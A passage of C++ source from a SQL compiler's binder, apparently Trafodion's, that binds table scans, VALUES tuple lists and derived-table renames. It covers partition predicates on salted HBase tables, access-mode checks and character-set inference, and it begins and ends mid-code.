      getTableName().getSpecialType() == ExtendedQualName::NORMAL_TABLE)
  {
    double s;
    s = getHint()->getSelectivity();
    if (0.0 <= s && s <= 1.0)
    {
      SelectivityHint *selHint = new (STMTHEAP) SelectivityHint();
      selHint->setScanSelectivityFactor(s);
      tableDesc->setSelectivityHint(selHint);
    }

    if (getHint()->getCardinality() >= 1.0)
    {
      s = getHint()->getCardinality();
      CostScalar scanCard(s);
      if ((scanCard.getValue() - floor(scanCard.getValue())) > 0.00001)
        scanCard = ceil(scanCard.getValue());

      CardinalityHint *cardHint = new (STMTHEAP) CardinalityHint();
      cardHint->setScanCardinality(scanCard);
      tableDesc->setCardinalityHint(cardHint);
    }
  }

  setTableDesc(tableDesc);
  if (bindWA->errStatus())
    return this;
  setRETDesc(bindWA->getCurrentScope()->getRETDesc());

  if ((CmpCommon::getDefault(ALLOW_DML_ON_NONAUDITED_TABLE) == DF_OFF) &&
      (naTable && naTable->getClusteringIndex() &&
       !naTable->getClusteringIndex()->isAudited()))
  {
    *CmpCommon::diags() << DgSqlCode(-4211)
                        << DgTableName(
                             naTable->getTableName().getQualifiedNameAsAnsiString());
    bindWA->setErrStatus();
    return NULL;
  }

  // restricted partitions for HBase table
  if (naTable->isHbaseTable() &&
      (naTable->isPartitionNameSpecified() ||
       naTable->isPartitionRangeSpecified()))
  {
    PartitioningFunction * partFunc =
      naTable->getClusteringIndex()->getPartitioningFunction();

    // find the salt column and apply a predicate on the salt column.
    // For Hash2, since the partition key columns are the columns used to
    // build the _SALT_ column, we need to search all columns for the
    // _SALT_ column.
    const NAColumnArray &ccCols =
      (partFunc && partFunc->castToHash2PartitioningFunction()) ?
naTable->getClusteringIndex()->getAllColumns() : naTable->getClusteringIndex()->getPartitioningKeyColumns(); NABoolean saltColFound = FALSE; for (CollIndex i=0; i<ccCols.entries() && !saltColFound; i++) { if (ccCols[i]->isComputedColumn() && ccCols[i]->getColName() == ElemDDLSaltOptionsClause::getSaltSysColName()) { saltColFound = TRUE; // create a predicate "_SALT_" = <num> or // "_SALT_" between <num> and <num> Int32 beginPartNum = partFunc->getRestrictedBeginPartNumber() - 1; Int32 endPartNum = partFunc->getRestrictedEndPartNumber() - 1; // fill in defaults, indicated by -1 (-2 after subtraction above) if (beginPartNum < 0) beginPartNum = 0; if (endPartNum < 0) endPartNum = partFunc->getCountOfPartitions() - 1; ItemExpr *partPred = NULL; ColReference *saltColRef = new(bindWA->wHeap()) ColReference( new(bindWA->wHeap()) ColRefName( ccCols[i]->getFullColRefName(), bindWA->wHeap())); if (beginPartNum == endPartNum) { partPred = new(bindWA->wHeap()) BiRelat (ITM_EQUAL, saltColRef, new(bindWA->wHeap()) ConstValue(beginPartNum,bindWA->wHeap())); } else { partPred = new(bindWA->wHeap()) Between (saltColRef, new(bindWA->wHeap()) ConstValue(beginPartNum,bindWA->wHeap()), new(bindWA->wHeap()) ConstValue(endPartNum,bindWA->wHeap())); } ItemExpr *newSelPred = removeSelPredTree(); if (newSelPred) newSelPred = new(bindWA->wHeap()) BiLogic(ITM_AND, newSelPred, partPred); else newSelPred = partPred; // now add the partition predicates addSelPredTree(newSelPred->bindNode(bindWA)); } } if (!saltColFound) { // not allowed to select individual partitions from HBase tables // unless they are salted char buf[20]; snprintf(buf, 20, "%d", partFunc->getRestrictedBeginPartNumber()); *CmpCommon::diags() << DgSqlCode(-1276) << DgString0(buf) << DgTableName( naTable->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return NULL; } } // Bind the base class. // RelExpr *boundExpr = bindSelf(bindWA); if (bindWA->errStatus()) return this; // // Assign the set of columns that belong to the table to be scanned // as the output values that can be produced by this scan. // getGroupAttr()->addCharacteristicOutputs(getTableDesc()->getColumnList()); getGroupAttr()->addCharacteristicOutputs(getTableDesc()->hbaseTSList()); // MV -- if (getInliningInfo().isMVLoggingInlined()) projectCurrentEpoch(bindWA); // QSTUFF // Second we make sure the the underlying base table is key sequenced in case // of embedded d/u and streams // -- for as long as we don't support entry sequenced tables if (getGroupAttr()->isStream()){ if (!naTable->getClusteringIndex()->isKeySequenced() || naTable->hasVerticalPartitions()){ *CmpCommon::diags() << DgSqlCode(-4204) << DgTableName(naTable->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return NULL; } if (!getTableDesc()->getClusteringIndex()->getNAFileSet()->isAudited()) { // Stream access not allowed on a non-audited table *CmpCommon::diags() << DgSqlCode(-4215) << DgTableName( naTable->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return NULL; } } if (getGroupAttr()->isEmbeddedUpdateOrDelete()){ if (!naTable->getClusteringIndex()->isKeySequenced() || naTable->hasVerticalPartitions()){ *CmpCommon::diags() << DgSqlCode(-4205) << DgTableName(naTable->getTableName().getQualifiedNameAsAnsiString()) << (getGroupAttr()->isEmbeddedUpdate() ? DgString0("UPDATE") : DgString0("DELETE")); bindWA->setErrStatus(); return NULL; } } // QSTUFF // Fix "browse access mode incorrectly starts transaction" genesis case // 10-021111-1080. 
Here's a glimpse at what may have been the original // intent of the old code (taken from RelExpr.h comment for the now // defunct RelExpr::propagateAccessOptions): // // At parse time, user can specify statement level access options. // (See SQL/ARK Language spec). These options are attached to the // RelRoot node and could be different for different Scans in the query. // All Scan and Update nodes under a RelRoot have the same Access // type and the Lock Mode. // // The problem is propagateAccessOptions did not visit all the Scans, // eg, it did not propagate to subquery Scans, and it did not propagate // to internal RelRoots. This "push" model seems harder to understand // and to do correctly. // // So, we go with the "pull" model. An interesting node such as a Scan, // GenericUpdate, RelRoot that needs a user-specified access/lock mode // can "pull" one from BindWA. BindWA already implements SQL scoping // and visibility rules. It's easier to explain also. Each table // reference inherits the user-specified access/lock mode of the // nearest SQL scope, going from the table outwards. If the entire // query has no user-specified access/lock mode, then it uses the // session-level default access/lock mode. // // if we have no user-specified access options then // get it from nearest enclosing scope that has one (if any) if (!accessOptions().userSpecified()) { StmtLevelAccessOptions *axOpts = bindWA->findUserSpecifiedAccessOption(); if (axOpts) { accessOptions() = *axOpts; } } // The above code is in RelRoot::bindNode also. // It would be nice to refactor this common code; someday. // See Halloween handling code in GenericUpdate::bindNode if (accessOptions().userSpecified()) { if ( accessOptions().accessType() == REPEATABLE_ || accessOptions().accessType() == STABLE_ || accessOptions().accessType() == BROWSE_ ) { naTable->setRefsIncompatibleDP2Halloween(); } } else { TransMode::IsolationLevel il = CmpCommon::transMode()->getIsolationLevel(); if((CmpCommon::transMode()->ILtoAT(il) == REPEATABLE_ ) || (CmpCommon::transMode()->ILtoAT(il) == STABLE_ ) || (CmpCommon::transMode()->ILtoAT(il) == BROWSE_ )) { naTable->setRefsIncompatibleDP2Halloween(); } } const NAString * tableLockVal = ActiveControlDB()->getControlTableValue( getTableName().getUgivenName(), "TABLELOCK"); if (*tableLockVal == "ON") naTable->setRefsIncompatibleDP2Halloween(); //Embedded update/delete queries on partitioned table //generates assertion when ATTEMPT_ASYNCHRONOUS_ACCESS //flag is OFF.This is because split operator is used. //Removing of split top operator causes some problems. //Error 66 from file system is one of them. //So, for now compiler will generate error if these //conditions occur. if (getGroupAttr()->isEmbeddedUpdateOrDelete() && naTable->getClusteringIndex()->isPartitioned() && (CmpCommon::getDefault(ATTEMPT_ASYNCHRONOUS_ACCESS) == DF_OFF)) { *CmpCommon::diags() << DgSqlCode(-4321) << DgTableName(naTable->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return NULL; } // Stream access not allowed on a multi-partioned access paths, when // CQD ATTEMPT_ASYNCHRONOUS_ACCESS is set to OFF.If we find // that all access paths are partitioned we give an error. 
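  // (The loop below inspects every index/access path of the table and
  //  raises the error only if all of them are partitioned.)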
if (getGroupAttr()->isStream() && (CmpCommon::getDefault(ATTEMPT_ASYNCHRONOUS_ACCESS) == DF_OFF)) { NABoolean atleastonenonpartitionedaccess = FALSE; NAFileSetList idescList = naTable->getIndexList(); for(CollIndex i = 0; i < idescList.entries() && !atleastonenonpartitionedaccess; i++) if(!(idescList[i]->isPartitioned()) ) atleastonenonpartitionedaccess = TRUE; if (!atleastonenonpartitionedaccess) { *CmpCommon::diags() << DgSqlCode(-4320) << DgTableName(naTable->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return NULL; } } if (hbaseAccessOptions_) { if (hbaseAccessOptions_->isMaxVersions()) { hbaseAccessOptions_->setHbaseVersions ( getTableDesc()->getClusteringIndex()->getNAFileSet()->numMaxVersions() ); } } return boundExpr; } // Scan::bindNode() //---------------------------------------------------------------------------- RelExpr *Scan::bindExpandedMaterializedView(BindWA *bindWA, NATable *naTable) { CollHeap *heap = bindWA->wHeap(); MVInfoForDML *mvInfo = naTable->getMVInfo(bindWA); QualifiedName mvName(mvInfo->getNameOfMV(), 3, heap, bindWA); CorrName mvCorrName(mvName, heap, getTableName().getCorrNameAsString()); RelExpr *viewTree = mvInfo->buildMVSelectTree(); viewTree = new(heap) RenameTable(TRUE, viewTree, mvCorrName); viewTree->addSelPredTree(removeSelPredTree()); RelExpr *boundExpr = viewTree->bindNode(bindWA); if (bindWA->errStatus()) return this; if (naTable->getClusteringIndex()->hasSyskey()) { // In case the MV on top of this MV is an MJV, it needs the SYSKEY // column of this MV. Since the SYSKEY column is not projected from // the select list of this MV, just fake it. It's value will never be // used anyway - just it's existance. ConstValue *dummySyskey = new(heap) ConstValue(0); dummySyskey->changeType(new(heap) SQLLargeInt()); ItemExpr *dummySyskeyCol = dummySyskey->bindNode(bindWA); if (bindWA->errStatus()) return this; ColRefName syskeyName("SYSKEY", mvCorrName); boundExpr->getRETDesc()->addColumn(bindWA, syskeyName, dummySyskeyCol->getValueId(), SYSTEM_COLUMN); } bindWA->getCurrentScope()->setRETDesc(boundExpr->getRETDesc()); return boundExpr; } //---------------------------------------------------------------------------- // This Scan needs to project the CurrentEpoch column. // Create and bind the CurrentEpoch function void Scan::projectCurrentEpoch(BindWA *bindWA) { ItemExpr *currEpoch = new(bindWA->wHeap()) GenericUpdateOutputFunction(ITM_CURRENTEPOCH); currEpoch->bindNode(bindWA); // Add it to the RETDesc ColRefName virtualColName(InliningInfo::getEpochVirtualColName()); getRETDesc()->addColumn(bindWA, virtualColName, currEpoch->getValueId()); // And force the generator to project it even though it is not // a column in the IndexDesc. ValueIdSet loggingCols; loggingCols.insert(currEpoch->getValueId()); setExtraOutputColumns(loggingCols); } // ----------------------------------------------------------------------- // methods for class Tuple // ----------------------------------------------------------------------- // Genesis 10-990226-4329 and 10-000221-6676. static RelExpr *checkTupleElementsAreAllScalar(BindWA *bindWA, RelExpr *re) { if (!re) return NULL; RETDesc *rd = re->getRETDesc(); CMPASSERT(rd); // an empty tuple is okay (dummy for Triggers, e.g.) 
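// A couple of illustrative (hypothetical) statements for the checks below:
//   values ((select a, b from s), 1);   -- error 4125: the subquery in a
//                                          VALUES clause must be scalar
//   values ((select max(a) from s));    -- single row subquery; rewritten
//                                          either to the subquery itself or
//                                          to a ONE_ROW group-by, depending
//                                          on COMP_BOOL_137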
  const ColumnDescList &cols = *rd->getColumnList();

  for (CollIndex i = cols.entries(); i--; ) {
    ColumnDesc *col = cols[i];

    Subquery *subq = (Subquery *)cols[i]->getValueId().getItemExpr();
    if (subq->isASubquery()) {
      if (cols.entries() > 1 && subq->getDegree() > 1) {
        // 4125 The select list of a subquery in a VALUES clause must be scalar.
        *CmpCommon::diags() << DgSqlCode(-4125);
        bindWA->setErrStatus();
        return NULL;
      }
      else if (cols.entries() == 1) {
        // if cols.entries() > 1 && subq->getDegree() > 1
        // we do not want to make the transformation below. We want to keep the
        // values clause, so that it can be attached by a tsj to the subquery
        // during transform.
        CMPASSERT(subq->isARowSubquery());
        if (CmpCommon::getDefault(COMP_BOOL_137) == DF_ON)
        {
          ValueIdList subqSelectList;
          RETDesc *subqRD = subq->getSubquery()->getRETDesc()->nullInstantiate(
               bindWA, TRUE/*forceCast for GenRelGrby*/, subqSelectList);
          subq->getSubquery()->setRETDesc(subqRD);
          ItemExpr *agg = new(bindWA->wHeap())
            Aggregate(ITM_ONE_ROW, subqSelectList.rebuildExprTree());
          RelExpr * gby = new(bindWA->wHeap())
            GroupByAgg(subq->getSubquery(), REL_GROUPBY, NULL, agg);
          NABoolean save = bindWA->getCurrentScope()->context()->inTupleList();
          bindWA->getCurrentScope()->context()->inTupleList() = TRUE;
          gby = gby->bindNode(bindWA);
          bindWA->getCurrentScope()->context()->inTupleList() = save;
          return gby;
        }
        else
        {
          return subq->getSubquery();
        }
      }
    }
  }
  return re;
}

RelExpr *Tuple::bindNode(BindWA *bindWA)
{
  if (nodeIsBound())
  {
    bindWA->getCurrentScope()->setRETDesc(getRETDesc());
    return this;
  }

  // Used by rowsets. We search for occurrences of arrays within this node to
  // replace them with scalar variables
  if (bindWA->getHostArraysArea() && !bindWA->getHostArraysArea()->done())
  {
    RelExpr *boundExpr = bindWA->getHostArraysArea()->modifyTupleNode(this);

    if (boundExpr)
      return checkTupleElementsAreAllScalar(bindWA, boundExpr);
  }

  bindChildren(bindWA);
  if (bindWA->errStatus()) return this;

  // Detach the item expression tree for the value list and bind it.
  // We use counterForRowValues() and pass in parent, for DEFAULT processing
  // (Ansi 7.1 SR 1).
  //
  CollIndex counterRowVals = 0;
  CMPASSERT(!bindWA->getCurrentScope()->context()->counterForRowValues());
  bindWA->getCurrentScope()->context()->counterForRowValues() = &counterRowVals;
  //
  setRETDesc(bindRowValues(bindWA, removeTupleExprTree(), tupleExpr(), this, FALSE));
  if (bindWA->errStatus()) return this;
  //
  bindWA->getCurrentScope()->context()->counterForRowValues() = NULL;

  // Do NOT set currently scoped RETDesc to this VALUES(...) RETDesc --
  // makes "select * from t where ((values(1)),a) = (1,2);"
  // fail with error 4001 "column A not found, no named tables in scope"
  //
  //   bindWA->getCurrentScope()->setRETDesc(getRETDesc());

  // Bind the base class.
  //
  RelExpr *boundExpr = bindSelf(bindWA);   // -- Trigger
  if (bindWA->errStatus()) return this;
  //
  // for case 10-020716-5497
  RelExpr *newExpr = checkTupleElementsAreAllScalar(bindWA, boundExpr);

  // Before doing anything with newExpr, make sure it is not null; it can
  // be null if there is an error in checkTupleElementsAreAllScalar.
getGroupAttr()->addCharacteristicOutputs(tupleExpr()); return newExpr; } // Tuple::bindNode() // ----------------------------------------------------------------------- // methods for class TupleList // ----------------------------------------------------------------------- RelExpr *TupleList::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } RelExpr * boundExpr = NULL; bindChildren(bindWA); if (bindWA->errStatus()) return this; ExprValueId eVid(tupleExprTree()); ItemExprTreeAsList tupleList(&eVid, ITM_ITEM_LIST); NABoolean castTo = castToList().entries() > 0; if (tupleExprTree()->containsSubquery() || tupleExprTree()->containsUDF() #ifndef NDEBUG || getenv("UNIONED_TUPLES") #endif ) { // Make a union'ed tree of all the tuples in tupleList. ## // This is done coz TupleList doesn't handle transformation ## // of subqueries in tuples correctly yet. ## CollIndex nTupleListEntries = (CollIndex)tupleList.entries(); for (CollIndex i = 0; i < nTupleListEntries ; i++) { ItemExpr *ituple = tupleList[i]->child(0)->castToItemExpr(); RelExpr *rtuple = new(bindWA->wHeap()) Tuple(ituple); rtuple = rtuple->bindNode(bindWA); if (bindWA->errStatus()) return this; // If INSERTing a TupleList, make some Assign's (even tmp's work!) // to do some error-checking for MP-NCHAR-as-single-byte target columns. // // Similar code exists in // (a) the loop further down, (b) TupleList::codeGen() // and yes, it needs to be in all three places. // // NOTE: tmpAssign MUST BE ON HEAP -- // Cannot be done with a stack-allocated tmpAssign // because ItemExpr destructor will delete children, // which we (and parent) are still referencing! if (castTo) { const ColumnDescList &itms = *rtuple->getRETDesc()->getColumnList(); for (CollIndex j = 0; j < (CollIndex)itms.entries(); j++) { ValueId src = itms[j]->getValueId(); Assign *tmpAssign = new(bindWA->wHeap()) Assign(castToList()[j].getItemExpr(), src.getItemExpr()); tmpAssign = (Assign *)tmpAssign->bindNode(bindWA); if (bindWA->errStatus()) return this; } } if (!boundExpr) boundExpr = rtuple; else boundExpr = new(bindWA->wHeap()) Union(boundExpr, rtuple); } // for loop over tupleList CMPASSERT(boundExpr); return boundExpr->bindNode(bindWA); } // containsSubquery // Detach the item expression tree for the value list and bind it. // We use counterForRowValues() and pass in parent, for DEFAULT processing // (Ansi 7.1 SR 1). // CollIndex counterRowVals = 0; CMPASSERT(!bindWA->getCurrentScope()->context()->counterForRowValues()); bindWA->getCurrentScope()->context()->counterForRowValues() = &counterRowVals; // tupleExprTree() contains a list of tuples. // Each tuple is also a list of values (this list may contain one item). // Bind all values in all the tuples. // Check that the number of elements in each tuple is the same, // and that the types of corresponding elements are compatible. // numberOfTuples_ = tupleList.entries(); CollIndex prevTupleNumEntries = NULL_COLL_INDEX; // A list of ValueIdUnions nodes. Will create as many as there are // entries in each tuple. The valIds from corresponding elements of // the tuples will be added so that each ValueIdUnion represents a // column of the tuple virtual table. Used to determine the // union-compatible type to be used for the result type produced by // the tuplelist. 
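  // For example (illustrative): VALUES (1,'a'),(2,'b') builds two ValueIdUnion
  // nodes, one unioning {1, 2} and one unioning {'a', 'b'}, so that each column
  // of the virtual table synthesizes a single union-compatible type.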
// ItemExprList vidUnions(bindWA->wHeap()); ValueIdUnion *vidUnion; CollIndex i = 0; CollIndex nEntries = (CollIndex)tupleList.entries() ; for (i = 0; i < nEntries ; i++) { counterRowVals = 0; ValueIdList vidList; ItemExpr *tuple = tupleList[i]->child(0)->castToItemExpr(); tuple->convertToValueIdList(vidList, bindWA, ITM_ITEM_LIST, this); if (bindWA->errStatus()) return NULL; if (prevTupleNumEntries == NULL_COLL_INDEX) { prevTupleNumEntries = vidList.entries(); } else if (prevTupleNumEntries != vidList.entries()) { // 4126 The row-value-ctors of a VALUES must be of equal degree. *CmpCommon::diags() << DgSqlCode(-4126); bindWA->setErrStatus(); return NULL; } // Genesis 10-980611-7153 if (castTo && prevTupleNumEntries != castToList().entries()) break; for (CollIndex j = 0; j < prevTupleNumEntries; j++) { // If any unknown type in the tuple, coerce it to the target type. // Also do same MP-NCHAR magic as above. if (castTo) { ValueId src = vidList[j]; src.coerceType(castToList()[j].getType()); // tmpAssign MUST BE ON HEAP -- see note above! Assign *tmpAssign = new(bindWA->wHeap()) Assign(castToList()[j].getItemExpr(), src.getItemExpr()); tmpAssign = (Assign *)tmpAssign->bindNode(bindWA); if (bindWA->errStatus()) return this; } if(i == 0) { ValueIdList vids; // Create an empty ValueIdUnion. Will create as many as there // are entries in each tuple. Add the valIds from // corresponding elements of the tuples so that each // ValueIdUnion represents a column of the tuple virtual // table. // vidUnion = new(bindWA->wHeap()) ValueIdUnion(vids, NULL_VALUE_ID); vidUnion->setWasDefaultClause(TRUE); vidUnions.insertAt(j, vidUnion); } // Add the valIds from corresponding elements of the tuples so // that each ValueIdUnion represents a column of the tuple // virtual table. // vidUnion = (ValueIdUnion *)vidUnions[j]; vidUnion->setSource((Lng32)i, vidList[j]); if (NOT vidList[j].getItemExpr()->wasDefaultClause()) vidUnion->setWasDefaultClause(FALSE); } // for loop over entries in tuple } // for loop over tupleList if (castTo && prevTupleNumEntries != castToList().entries()) { // 4023 degree of row value constructor must equal that of target table *CmpCommon::diags() << DgSqlCode(-4023) << DgInt0((Lng32)prevTupleNumEntries) << DgInt1((Lng32)castToList().entries()); bindWA->setErrStatus(); return NULL; } // do INFER_CHARSET fixup if (!doInferCharSetFixup(bindWA, CharInfo::ISO88591, prevTupleNumEntries, tupleList.entries())) { return NULL; } ItemExpr * outputList = NULL; for (CollIndex j = 0; j < prevTupleNumEntries; j++) { // Get the ValueIdUnion node corresponding to this column of the // tuple list virtual table // vidUnion = (ValueIdUnion *)vidUnions[j]; if (castTo) { // Make sure the place holder type can support all the values in // the tuple list and target column // vidUnion->setSource(numTuples(), castToList()[j]); } vidUnion->bindNode(bindWA); if (bindWA->errStatus()) return NULL; if (castTo) { // Check that the source and target types are compatible. // Cannot be done with a stack-allocated tmpAssign // because ItemExpr destructor will delete children, // which we (and parent) are still referencing! 
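      // Note: this Assign is a throw-away; it exists only so synthesizeType()
      // below can verify that the tuple-list column is assignable to the
      // target column. It is not inserted into the expression tree.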
Assign *tmpAssign = new(bindWA->wHeap()) Assign(castToList()[j].getItemExpr(), vidUnion); if ( CmpCommon::getDefault(ALLOW_IMPLICIT_CHAR_CASTING) == DF_ON ) { tmpAssign->tryToDoImplicitCasting(bindWA); } const NAType *targetType = tmpAssign->synthesizeType(); if (!targetType) { bindWA->setErrStatus(); return NULL; } } NAType *phType = vidUnion->getValueId().getType().newCopy(bindWA->wHeap()); NATypeToItem *placeHolder = new(bindWA->wHeap()) NATypeToItem(phType); Cast * cnode; if (castTo) { cnode = new(bindWA->wHeap()) Cast(placeHolder, phType, ITM_CAST, TRUE); if (vidUnion->getValueId().getItemExpr()->wasDefaultClause()) cnode->setWasDefaultClause(TRUE); } else cnode = new(bindWA->wHeap()) Cast(placeHolder, phType); cnode->setConstFoldingDisabled(TRUE); cnode->bindNode(bindWA); if (!outputList) outputList = cnode; else outputList = new(bindWA->wHeap()) ItemList(outputList, cnode); } setRETDesc(bindRowValues(bindWA, outputList, tupleExpr(), this, FALSE)); if (bindWA->errStatus()) return this; bindWA->getCurrentScope()->context()->counterForRowValues() = NULL; // Bind the base class. // boundExpr = bindSelf(bindWA); if (bindWA->errStatus()) return this; // need to add system columns as well....? NABoolean inSubquery = FALSE; BindScope *currScope = bindWA->getCurrentScope(); BindScope *prevScope = bindWA->getPreviousScope(currScope); if (prevScope) inSubquery = prevScope->context()->inSubquery(); if (inSubquery) { // need to change tupleExpr() & make it null-instantiated as RETDesc stores // null instantiated columns (most probably these are constants, but not // necessarily) const ColumnDescList *viewColumns = getRETDesc()->getColumnList(); tupleExpr().clear(); for (CollIndex k=0; k < viewColumns->entries(); k++) { ValueId vid = (*viewColumns)[k]->getValueId(); // Special logic in Normalizer to optimize away a LEFT JOIN is not to // be explored there, as this is not a LEFT JOIN // Genesis case: 10-010312-1675 // If the query were to be a LEFT JOIN, we would not be here if (vid.getItemExpr()->getOperatorType() == ITM_INSTANTIATE_NULL) { ((InstantiateNull *)vid.getItemExpr())->NoCheckforLeftToInnerJoin = TRUE; } tupleExpr().insert(vid); } } getGroupAttr()->addCharacteristicOutputs(tupleExpr()); return boundExpr; } // TupleList::bindNode() // set vidlist = ith tuple of this tuplelist and return TRUE RelExpr* TupleList::getTuple (BindWA *bindWA, ValueIdList& vidList, CollIndex i) { ExprValueId eVid(tupleExprTree()); ItemExprTreeAsList tupleList(&eVid, ITM_ITEM_LIST); ItemExpr *tuple = tupleList[i]->child(0)->castToItemExpr(); tuple->convertToValueIdList(vidList, bindWA, ITM_ITEM_LIST, this); return bindWA->errStatus() ? 
NULL : this; } // set needsFixup to TRUE iff tuplelist needs INFER_CHARSET fixup RelExpr* TupleList::needsCharSetFixup(BindWA *bindWA, CollIndex arity, CollIndex nTuples, NAList<NABoolean> &strNeedsFixup, NABoolean &needsFixup) { // assume it needs no INFER_CHARSET fixup until proven otherwise needsFixup = FALSE; if (CmpCommon::wantCharSetInference()) { CollIndex t, x; for (x = 0; x < arity; x++) { // initialize strNeedsFixup.insert(FALSE); } // go thru tuplelist looking for unprefixed string literals for (t = 0; t < nTuples; t++) { // get tuple ValueIdList tup; if (!getTuple(bindWA, tup, t)) { return NULL; // something wrong } else { // go thru columns of tuple looking for unprefixed string literals for (x = 0; x < arity; x++) { if (!strNeedsFixup[x] && tup[x].inferableCharType()) { strNeedsFixup[x] = TRUE; needsFixup = TRUE; } } } } } return this; // all OK } // find fixable strings' inferredCharTypes RelExpr* TupleList::pushDownCharType(BindWA *bindWA, enum CharInfo::CharSet cs, NAList<const CharType*> &inferredCharType, NAList<NABoolean> &strNeedsFixup, CollIndex arity, CollIndex nTuples) { // mimic CharType::findPushDownCharType() logic const CharType* dctp = CharType::desiredCharType(cs); NAList<const CharType*> sampleCharType(CmpCommon::statementHeap(),arity); NAList<Int32> total(CmpCommon::statementHeap(),arity); NAList<Int32> ct (CmpCommon::statementHeap(),arity); CollIndex t, x; for (x = 0; x < arity; x++) { // initialize total.insert(0); ct.insert(0); sampleCharType.insert(NULL); } // go thru tuplelist looking for fixable strings' inferredCharType for (t = 0; t < nTuples; t++) { // get tuple ValueIdList tup; if (!getTuple(bindWA, tup, t)) { return NULL; // something wrong } else { // go thru tuple looking for fixable strings' inferredCharType for (x = 0; x < arity; x++) { if (strNeedsFixup[x]) { total[x] += 1; const CharType *ctp; if (tup[x].hasKnownCharSet(&ctp)) { ct[x] += 1; if (sampleCharType[x] == NULL) { sampleCharType[x] = ctp; } } } } } } for (x = 0; x < arity; x++) { if (ct[x] == total[x]) { // all have known char set or none need fixup inferredCharType.insert(NULL); // nothing to fix } else { inferredCharType.insert(sampleCharType[x] ? 
sampleCharType[x] : dctp); } } return this; // all OK } // do INFER_CHARSET fixup RelExpr* TupleList::doInferCharSetFixup(BindWA *bindWA, enum CharInfo::CharSet cs, CollIndex arity, CollIndex nTuples) { NABoolean needsFixup; NAList<NABoolean> strNeedsFixup(CmpCommon::statementHeap(),arity); RelExpr *result = needsCharSetFixup (bindWA, arity, nTuples, strNeedsFixup, needsFixup); if (!result || // something went wrong !needsFixup) { // no INFER_CHARSET fixup needed return result; } else { // some string literal needs INFER_CHARSET fixup NAList<const CharType*> inferredCharType(CmpCommon::statementHeap(),arity); if (!pushDownCharType(bindWA, cs, inferredCharType, strNeedsFixup, arity, nTuples)) { return NULL; // something went wrong } else { // go thru tuplelist fixing up literals' char sets CollIndex t, x; for (t = 0; t < nTuples; t++) { // get tuple ValueIdList tup; if (!getTuple(bindWA, tup, t)) { return NULL; // something went wrong } else { // go thru tuple fixing up literals' char sets for (x = 0; x < arity; x++) { if (strNeedsFixup[x] && tup[x].inferableCharType()) { // coerce literal to have column's inferred char set tup[x].coerceType(*(inferredCharType[x]), NA_CHARACTER_TYPE); } } } } } } return this; } // ----------------------------------------------------------------------- // member functions for class RenameTable // ----------------------------------------------------------------------- RelExpr *RenameTable::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); // -- Triggers return this; } // // Create a new table name scope. // bindWA->getCurrentScope()->xtnmStack()->createXTNM(); // code to enforce the specification that if an index expression is specified // with a rowset and the index is included in the derived table, the index // must be the last column of the derived column list if((getTableName().getCorrNameAsString() != "Rowset___") && (getArity() != 0)) { if(child(0)->getOperatorType() == REL_ROWSET) { NAString indexExpr(bindWA->wHeap()); NAString lastString("", bindWA->wHeap()); ItemExpr *tempPtr; indexExpr = ((Rowset *)getChild(0))->getIndexName(); if((indexExpr != "") && newColNamesTree_) { for (tempPtr = newColNamesTree_; tempPtr; tempPtr=tempPtr->child(1)) { Int32 arity = tempPtr->getArity(); if(arity == 1) { lastString = ((RenameCol *)tempPtr)->getNewColRefName()->getColName(); } } if(indexExpr != lastString) { *CmpCommon::diags() << DgSqlCode(-30012) << DgString0(indexExpr) << DgString1(getTableName().getCorrNameAsString()); bindWA->setErrStatus(); return NULL; } } } } // // Bind the child nodes. // bindChildren(bindWA); if (bindWA->errStatus()) return this; // // Remove the table name scope. // bindWA->getCurrentScope()->xtnmStack()->removeXTNM(); // // Create the result table. // RETDesc *resultTable = new (bindWA->wHeap()) RETDesc(bindWA); const RETDesc &sourceTable = *child(0)->getRETDesc(); const CorrName &tableName = getTableName(); ItemExpr *derivedColTree = removeColNameTree(); ItemExprList derivedColList(bindWA->wHeap()); const NAString *simpleColNameStr; CollIndex i; // // Check that there are an equal number of columns to values. // if (derivedColTree) { derivedColList.insertTree(derivedColTree); if (derivedColList.entries() != sourceTable.getDegree()) { // 4016 The number of derived columns must equal the degree of the derived table. 
*CmpCommon::diags() << DgSqlCode(-4016) #pragma nowarn(1506) // warning elimination << DgInt0(derivedColList.entries()) << DgInt1(sourceTable.getDegree()); #pragma warn(1506) // warning elimination bindWA->setErrStatus(); delete resultTable; return this; } } // // Insert the derived column names into the result table. // By ANSI 6.3 SR 6 (applies to explicit derived column list), // duplicate names are not allowed. // If user did not specify a derived column name list, // expose the select list's column names (implicit derived column list); // ANSI does not say that these cannot be duplicates -- // if there's a later (i.e. in an outer scope) reference to a duplicately // named column, ColReference::bindNode will issue an error // (in particular, if all references are to constants, e.g. "count(*)", // then duplicates are not disallowed in the implicit derived column list!). // // When Create View DDL uses this Binder, we must enforce // ANSI 11.19 SR 8 + 9, clearly disallowing dups/ambigs // (and disallowing implem-dependent names, i.e. our unnamed '(expr)' cols!). // for (i = 0; i < sourceTable.getDegree(); i++) { // if (derivedColTree) { // explicit derived column list CMPASSERT(derivedColList[i]->getOperatorType() == ITM_RENAME_COL); simpleColNameStr = &((RenameCol *) derivedColList[i])-> getNewColRefName()->getColName(); if (*simpleColNameStr != "") { // named column, not an expression if (resultTable->findColumn(*simpleColNameStr)) { ColRefName errColName(*simpleColNameStr, tableName); // 4017 Derived column name $ColumnName was specified more than once. *CmpCommon::diags() << DgSqlCode(-4017) << DgColumnName(errColName.getColRefAsAnsiString()); bindWA->setErrStatus(); delete resultTable; return this; } } } else // implicit derived column list simpleColNameStr = &sourceTable.getColRefNameObj(i).getColName(); // ColRefName colRefName(*simpleColNameStr, tableName); ValueId valId = sourceTable.getValueId(i); resultTable->addColumn(bindWA, colRefName, valId); } // for-loop // // Insert system columns similarly, completely ignoring dup names. // const ColumnDescList &sysColList = *sourceTable.getSystemColumnList(); for (i = 0; i < sysColList.entries(); i++) { simpleColNameStr = &sysColList[i]->getColRefNameObj().getColName(); if (NOT resultTable->findColumn(*simpleColNameStr)) { ColRefName colRefName(*simpleColNameStr, tableName); ValueId valId = sysColList[i]->getValueId(); // (slight diff from the 